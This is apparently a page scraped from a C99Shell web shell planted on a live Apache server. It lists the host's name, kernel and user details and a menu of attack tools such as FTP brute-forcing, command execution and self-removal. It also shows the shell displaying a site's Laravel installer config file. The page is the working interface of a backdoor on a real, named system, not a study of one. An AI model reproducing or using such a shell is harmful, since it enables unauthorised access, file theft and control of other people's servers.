!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/config/   drwxr-xr-x
Free 26.17 GB of 117.98 GB (22.19%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     installer.php (2.45 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

return [

    
/*
    |--------------------------------------------------------------------------
    | PHP version requirement
    |--------------------------------------------------------------------------
    |
    | This is the default Laravel PHP requirement, you can change
    | it if your application require.
    |
    */
    
'core' => [
        
'minimumPhpVersion' => '8.0',
        
'minimumMysqlVersion' => '5.7'
    
],
    
'requirements' => [
        
'php' => [
            
'openssl',
            
'pdo',
            
'mbstring',
            
'tokenizer',
            
'JSON',
            
'cURL',
            
// 'mcrypt',
        
],
        
'apache' => [
            
'mod_rewrite',
        ],
    ],

    
'verify' => [
        
'installed' => env('APP_INSTALL'),
        
'install_key' => env('INSTALL_APP_SECRET')
    ],

    
/*
    |--------------------------------------------------------------------------
    | Folders Permissions
    |--------------------------------------------------------------------------
    |
    | This is the default Laravel folders permissions, if your application
    | requires more permissions just add them to the array list bellow.
    |
    */
    
'permissions' => [
        
'storage/app/'              => 775,
        
'storage/framework/'        => 775,
        
'storage/logs/'             => 775,
        
'bootstrap/cache/'          => 775,
        
'resources/lang/'           => 775,
        
'modules_statuses.json'     => 666,
        
'.env'                      => 666
    
],

    
/*
    |--------------------------------------------------------------------------
    | Administrator fields
    |--------------------------------------------------------------------------
    |
    | Set all fields as setted in create method of AuthController
    | Or in rules of form request
    |
    */
    
'fields' => [
        
'name' => ['type' => 'text''name' => 'Name'],
        
'email' => ['type' => 'email''name' => 'Email'],
        
'password' => ['type' => 'password''name' => 'Password'],
        
'password_confirmation' => ['type' => 'password''name' => 'Confirm Password'],
    ],


    
/*
    |--------------------------------------------------------------------------
    | Please don't remove the field else the script won't work
    |--------------------------------------------------------------------------
    |
    |
    */
    
'item_id' => 'dl9h8fb2rix'

];

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0046 ]--